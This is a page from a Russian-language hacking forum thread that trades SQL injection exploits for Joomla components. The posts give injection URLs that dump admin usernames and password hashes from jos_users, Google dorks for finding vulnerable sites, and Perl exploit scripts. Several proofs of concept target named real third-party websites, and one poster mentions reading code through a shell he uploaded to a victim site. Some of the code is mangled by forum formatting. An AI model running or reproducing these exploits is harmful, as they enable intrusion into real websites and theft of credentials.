FORUMS

MEMBERS

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
Обзор уязвимостей CMS [Joomla,Mambo] и их компонентов

Страница 26 из 37

« Первая

Последняя »

Опции темы

Поиск в этой теме

Опции просмотра

05.06.2012, 17:53

Skofield

Участник форума

Регистрация: 27.08.2008

Сообщений: 209

Провел на форуме:
1759582

Репутация: 394

Joomla "com_realty" SQL-inj

Уязвимый параметр:

Код:

Code:
http://site.com/index.php?option=com_realty&act=detailed&ln=[SQL-inj]

Эксплуатация:

Код:

Code:
http://site.com/index.php?option=com_realty&act=detailed&ln=-99999'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,176,177,178,179,180,181,182,183,184,185,186,187,188,189,190,191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,239,240,241,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,261,262,263,264,265,266,267,268,269,270,271,272,273,274,275,276,277,278,279,280,281,282,283,284,285,286,287,288,289,290--+

Замечание: 290 колонок. Простой скрипт, который подставит все колонки в url:

[PHP]
PHP:
[COLOR="#000000"][COLOR="#007700"]

05.06.2012, 19:13

winstrool

Познающий

Регистрация: 06.03.2007

Сообщений: 59

Провел на форуме:
371875

Репутация: 137

Цитата:

Сообщение от Skofield

Skofield said:
Joomla "com_realty" SQL-inj

/showpost.php?p=3077437&postcount=253

Дополнение к топику))

15.06.2012, 23:26

winstrool

Познающий

Регистрация: 06.03.2007

Сообщений: 59

Провел на форуме:
371875

Репутация: 137

Joomla "com_ponygallery" component SQL Injection

Захожу на сайт _http://www.exploit-db.com и вижу в поиске последнеи сплоиты на джумлу

сам сплоит не выложен но сказано что найдена уязвимость в древнем компаненте com_ponygallery

_http://www.exploit-db.com/exploits/18741/

ищу по дорку в гугле "inurl:com_ponygallery"

нахожу уязвимый сайт и раскручиваю два уязвимых параметра...

один как sqli:

Цитата:

Сообщение от None

_http://judo.perm.ru/i
ndex.php?option=com_ponygallery&Itemid=131&func=de tail&id=-270'+union+select+1,2,version(),4,5,6,7,8,9,0,11,1 2,13,14+--+

Второй как Blind:

h

Цитата:

Сообщение от None

ttp://www.trexgorka.ru/
index.php?option=com_ponygallery&Itemid=131&func=v iewcategory&catid=1'+and+1=1+--+
TRUE
http://www.trexgorka.ru/
index.php?option=com_ponygallery&Itemid=131&func=v iewcategory&catid=1'+and+1=0+--+
FALSE

Просматриваю код компанента на залитом шеле и нахожу уязвимый пораметре файла sub_viewdetails.php:

Цитата:

Сообщение от None

$database->setQuery(
"SELECT c.access FROM #__ponygallery_catg as c" . "\n left join #__ponygallery as a on a.catid=c.cid"
. "\n WHERE a.id= '$id'" );

а чтоб защитить компанент от уязвимости достаточно было добавить функцию "intval()"

anti-boyan по antichat'у в гуглу: "site:forum.antichat.ru com_ponygallery"

20.06.2012, 00:43

promarketing

Guest

Сообщений: n/a

Провел на форуме:
3814

Репутация: 0

Код:

Code:
============================================
Joomla!   (Multiple) ExploiT

============================================

#  Powered  Joomla! 1.5 & All version Down  (Multiple)
 
 
# Author: Mr.MLL
# Published: 2010-08-24
# Verified: yes
# Download Exploit Code
# Download N/A
 
===
 
 
# Software :  http://www.joomla.org/download.html
# Vendor   :  http://www.joomla.org/
# Contact  :  Y-3@hotmail.com
 
===

logout();

    // JS Popup message
    if ( $message ) {
        ?>

=========
# ExploiT
 
    http://127.0.0.1/path/index.php?option=cookiecheck&return=http://Google.com/
 
 
=========

# Thanks : milw0rm.com & exploit-db.com  & offsec.com & inj3ct0r.com & www.hack0wn.com

exit ,, / Praise be to God for the blessing of Islam

какой толк от этой уязвимости?

19.07.2012, 12:32

Mihanik

Guest

Сообщений: n/a

Провел на форуме:
0

Репутация: 0

кто сталкивался с джумловской защитой от прямого доступа к файлам? там в index.php определяется переменная JEXEC = '1', а во всех остальных файлах идет проверка:

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"]defined[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'_JEXEC'[/COLOR][COLOR="#007700"]) or die([/COLOR][COLOR="#DD0000"]'Restricted access'[/COLOR][COLOR="#007700"]);[/COLOR][COLOR="#FF8000"]// no direct access[/COLOR][/COLOR]

и соответственно при попытке изменить хоть на байт любой файл, код просто не прогружается.. все перекопал, но так и не понял что к чему..

есть у кого мысли как это обойти?

нужно сделать инклюд пхп файла в один файл шаблона, но эта самая защита не дает..

19.07.2012, 13:18

Ereee

Guest

Сообщений: n/a

Провел на форуме:
102354

Репутация: 267

Цитата:

Сообщение от Mihanik

Mihanik said:
кто сталкивался с джумловской защитой от прямого доступа к файлам? там в index.php определяется переменная JEXEC = '1', а во всех остальных файлах идет проверка:

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"]defined[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'_JEXEC'[/COLOR][COLOR="#007700"]) or die([/COLOR][COLOR="#DD0000"]'Restricted access'[/COLOR][COLOR="#007700"]);[/COLOR][COLOR="#FF8000"]// no direct access[/COLOR][/COLOR]

и соответственно при попытке изменить хоть на байт любой файл, код просто не прогружается.. все перекопал, но так и не понял что к чему..
есть у кого мысли как это обойти?
нужно сделать инклюд пхп файла в один файл шаблона, но эта самая защита не дает..

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#FF8000"]//defined('_JEXEC') or die('Restricted access'); // no direct access[/COLOR][/COLOR]

21.09.2012, 07:19

winstrool

Познающий

Регистрация: 06.03.2007

Сообщений: 59

Провел на форуме:
371875

Репутация: 137

Joomla "com_sobi2" component SQL Injection

Уязвим параметр fid при установленом параметре sobi2Task=dd_download, что позволяет провести SQL-injection.

id - должен быть существующий.

Эксплyатация:

Код:

Code:
index2.php?option=com_sobi2&sobi2Task=dd_download&fid=[id][SQLblind]

PoC:

Код:

Code:
http://open-psa.org/joomla1.5/index2.php?option=com_sobi2&sobi2Task=dd_download&fid=3+and+1=1+--+

true

Код:

Code:
http://open-psa.org/joomla1.5/index2.php?option=com_sobi2&sobi2Task=dd_download&fid=3+and+1=0+--+

false

Дорк: "inurl:com_sobi2 fid"

Цитата:

Сообщение от None

Результатов: примерно 509 000

Уязвимый код:

com_sobi2/plugins/download/download.class.php

Цитата:

Сообщение от None

Perl Exploit :

За основу был взят сплоит от сюда /showpost.php?p=755600&postcount=90

и переделан под данную уязвимость

Цитата:

Сообщение от None

#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;
if(!$ARGV[1])
{
print " \n";
print " ################################################## ##############\n";
print " # Joomla Component com_sobi2 Blind SQL Injection Exploit #\n";
print " # Author:winstrool #\n";
print " # #\n";
print " # Dork: inurl:com_sobi2 #\n";
print " # Usage: perl sobi2.pl host path #\n";
print " # Example: perl sobi2.pl www.host.com /joomla/ -t 11 #\n";
print " ################################################## ##############\n";
exit;
}
my $host = $ARGV[0];
my $path = $ARGV[1];
my $tid = $ARGV[2];
my %options = ();
GetOptions(\%options, "p=s", "t=i");
print "[~] Exploiting...\n";
if($options{"t"})
{
$tid = $options{"t"};
}
syswrite(STDOUT, "[~] MD5-Hash: ", 14);
for(my $i = 1; $i new;
my $query = "http://".$host.$path."index2.php?option=com_sobi2&sobi2Ta sk=dd_download&fid=".$tid." and (SUBSTRING((SELECT concat_ws(0x3a,user(),version(),database())),".$i. ",1))=CHAR(".$h.")";
if($options{"p"})
{
$ua->proxy('http', "http://".$options{"p"});
}
my $resp = $ua->get($query);
my $content = $resp->as_string;
if($content =~ /Disposition/)
{
return 1;
}
else
{
return 0;
}
}

26.09.2012, 23:40

winstrool

Познающий

Регистрация: 06.03.2007

Сообщений: 59

Провел на форуме:
371875

Репутация: 137

Joomla "com_ownbiblio" component SQL Injection

Уязвим параметр catid

Эксплyатация:

Код:

Code:
index.php?option=com_ownbiblio&catid=-1+union+select+1,2,3,concat(username,0x3a,password,0x3a,usertype),5,6,7,8,9,0,11,12,13,14,15,16,17+from+jos_users+--+

количество калонок может меняться!

POC:

Цитата:

Сообщение от None

http://www.wisdomtherapy.com/index.php?option=com_ownbiblio&catid=-1+union+select+1,2,3,concat%28user%28%29,version%2 8%29,database%28%29%29,5,6,7,8,9,0,11,12,13,14,15, 16,17+from+jos_users+--+&Itemid=0&year=All&search=&page=2&view=catalogu e

Дорк: "inurl:com_ownbiblio catid"

Уязвимый код:

сomponents/com_ownbiblio/models/ownbiblio.php

[QUOTE="None"]
function getCategoryByID($ID)
{
$query = "
SELECT
* FROM #__ownbiblio_categories WHERE ID =".
$ID
;
$category = $this->_getList($query);
return $category[0];
}
[ ... ]
function _getEntrysQuery($year = 'All', $catid = 0, $start, $end,$search = null, $ob_untilyear = null){
$query = "
SELECT
* FROM #__ownbiblio WHERE catid = " .
$catid
;
$limit = $ob_untilyear;
if($search){
$query .= " AND (tname LIKE '
%$search%
' OR ttitle LIKE '
%$search%
' OR tjourn LIKE '
%$search%
' OR tdate LIKE '
%$search%
' OR tdesc LIKE '
%$search%
' OR tkeys LIKE '
%$search%
')";
} elseif($year != 'All' && $year != 'Other'){
$query .= " AND tdate like '%" . $year . "%'";
} elseif($year == 'Other' && $ob_untilyear != null){
$query .= " AND tdate _getList($query);
return $category[0];
}
[ ... ]
function _getEntrysQuery($year = 'All', $catid = 0, $start, $end,$search = null, $ob_untilyear = null){
$query = "
SELECT
* FROM #__ownbiblio WHERE catid = " .
$catid
;
$limit = $ob_untilyear;
if($search){
$query .= " AND (tname LIKE '
%$search%
' OR ttitle LIKE '
%$search%
' OR tjourn LIKE '
%$search%
' OR tdate LIKE '
%$search%
' OR tdesc LIKE '
%$search%
' OR tkeys LIKE '
%$search%
')";
} elseif($year != 'All' && $year != 'Other'){
$query .= " AND tdate like '%" . $year . "%'";
} elseif($year == 'Other' && $ob_untilyear != null){
$query .= " AND tdate

19.10.2012, 21:24

winstrool

Познающий

Регистрация: 06.03.2007

Сообщений: 59

Провел на форуме:
371875

Репутация: 137

Joomla "com_jomtube" component SQL Injection

Уязвим параметр user_id

Эксплyатация:

Код:

Code:
index.php?view=videos&type=member&user_id=[ID юзера] and 1=0 union select 1,2,3,4,5,6,7,8,concat(username,0x3a,password,0x3a,usertype),0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 from jos_users limit 0,5 -- &option=com_jomtube

user_id - должен быть существующий!

POC:

Цитата:

Сообщение от None

http://www.mbrrealty.com.au/index.php?view=videos&type=member&user_id=63%20and %201=0%20union%20select%201,2,3,4,5,6,7,8,9,0,11,1 2,concat_ws%280x3a,user%28%29,version%28%29,databa se%28%29%29,14,15,16,17,18,19,20,21,22,23,24,25,26 ,27%20--%20&option=com_jomtube

Дорк: "inurl:com_jomtube"

Уязвимый код:

components/com_jomtube/models/video.php

Пару моментов, все приводить не буду:

Цитата:

Сообщение от None

$where
= ' WHERE v.id = ' .
$this->_id
;
$join = ' LEFT JOIN #__users AS u ON u.id = v.user_id';
$select = ' v.*, u.name, u.username';
if ($c->community == 'JomSocial') {
$join.= ' LEFT JOIN #__community_users AS p ON p.userid =
v.user_id
';
$select.= ', p.avatar';
}
$select .= ', c.directory, c.family_id, c.category_name';
$join .= ' JOIN #__jomtube_categories AS c ON c.id = v.category_id';
$query = '
SELECT ' . $select . ' FROM #__jomtube_videos AS v ' . $join . $where
;
[ ... ]
function getVideosincategory() {
$query = 'SELECT v.*, c.directory, u.username, c.category_name, u.id as userid '
. ' FROM #__jomtube_videos AS v '
. ' LEFT JOIN #__users AS u ON
v.user_id = u.id
'
. ' JOIN #__jomtube_categories AS c ON c.id = v.category_id'
. ' WHERE v.category_id = '.$this->_data->category_id
. ' AND v.id != ' .
$this->_id
. ' AND v.published = 1 '
. ' ORDER BY v.date_added DESC'
. ' LIMIT 20'
;
$this->_db->setQuery($query);
return $this->_db->loadObjectList();

P.S:Уязвимость старая и давно есть в паблике, как сегодня убедился до сих пор актуальна.

http://www.exploit-db.com/exploits/14434/

#10

19.10.2012, 21:33

Unknown

Guest

Сообщений: n/a

Провел на форуме:
28262

Репутация: 23

Joomla tag Remote Sql Exploit

dork: inurl:index.php?option=com_tag

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#FF8000"]#!/usr/bin/perl -w

[/COLOR][COLOR="#007700"]print[/COLOR][COLOR="#DD0000"]"\t\t\n\n"[/COLOR][COLOR="#007700"];

print[/COLOR][COLOR="#DD0000"]"\t\n"[/COLOR][COLOR="#007700"];

print[/COLOR][COLOR="#DD0000"]"\t                                                   \n"[/COLOR][COLOR="#007700"];

print[/COLOR][COLOR="#DD0000"]"\t      Joomla com_tag Remote Sql Exploit \n"[/COLOR][COLOR="#007700"];

print[/COLOR][COLOR="#DD0000"]"\t\n\n"[/COLOR][COLOR="#007700"];

use[/COLOR][COLOR="#0000BB"]LWP[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]UserAgent[/COLOR][COLOR="#007700"];

print[/COLOR][COLOR="#DD0000"]"\nExample:[http://wwww.site.com/]: "[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]chomp[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]my $target[/COLOR][COLOR="#007700"]=);

[/COLOR][COLOR="#0000BB"]$user[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"username"[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$pass[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"password"[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$table[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"jos_users"[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$d4n[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"com_tag&task"[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$b[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]LWP[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]UserAgent[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]new[/COLOR][COLOR="#007700"]() or die[/COLOR][COLOR="#DD0000"]"Could not initialize browser\n"[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$b[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]agent[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$host[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$target[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"index.php?option="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$d4n[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"&tag=999999.9' union all select 1,concat(0x3c757365723e,"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$user[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]",0x3c757365723e3c706173733e,"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$pass[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]",0x3c706173733e)+from "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$table[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"--+a"[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$b[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]request[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]HTTP[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]Request[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]new[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]GET[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$host[/COLOR][COLOR="#007700"]));

[/COLOR][COLOR="#0000BB"]$answer[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]content[/COLOR][COLOR="#007700"];

if ([/COLOR][COLOR="#0000BB"]$answer[/COLOR][COLOR="#007700"]=~ /(.*?)/){

print[/COLOR][COLOR="#DD0000"]"\nLos Information for site:\n"[/COLOR][COLOR="#007700"];

print[/COLOR][COLOR="#DD0000"]"\n

* Admin User : $1"[/COLOR][COLOR="#007700"];

}

if ([/COLOR][COLOR="#0000BB"]$answer[/COLOR][COLOR="#007700"]=~/(.*?)/){print[/COLOR][COLOR="#DD0000"]"\n

* Admin Hash : $1\n\n"[/COLOR][COLOR="#007700"];

print[/COLOR][COLOR="#DD0000"]"\t\t#   Exploit finished   #\n\n"[/COLOR][COLOR="#007700"];}

else{print[/COLOR][COLOR="#DD0000"]"\n[-] Exploit Failed...\n"[/COLOR][COLOR="#007700"];}

[/COLOR][/COLOR]

Страница 26 из 37

« Первая

Последняя »

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
[Обзор уязвимостей в форумных движках]	Grey	Уязвимости CMS / форумов	49	02.04.2015 17:48
Обзор бесплатных Cms	em00s7	PHP	16	03.07.2009 13:13
Cms	Cawabunga	PHP	20	05.08.2007 00:31

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

ANTICHAT.XYZ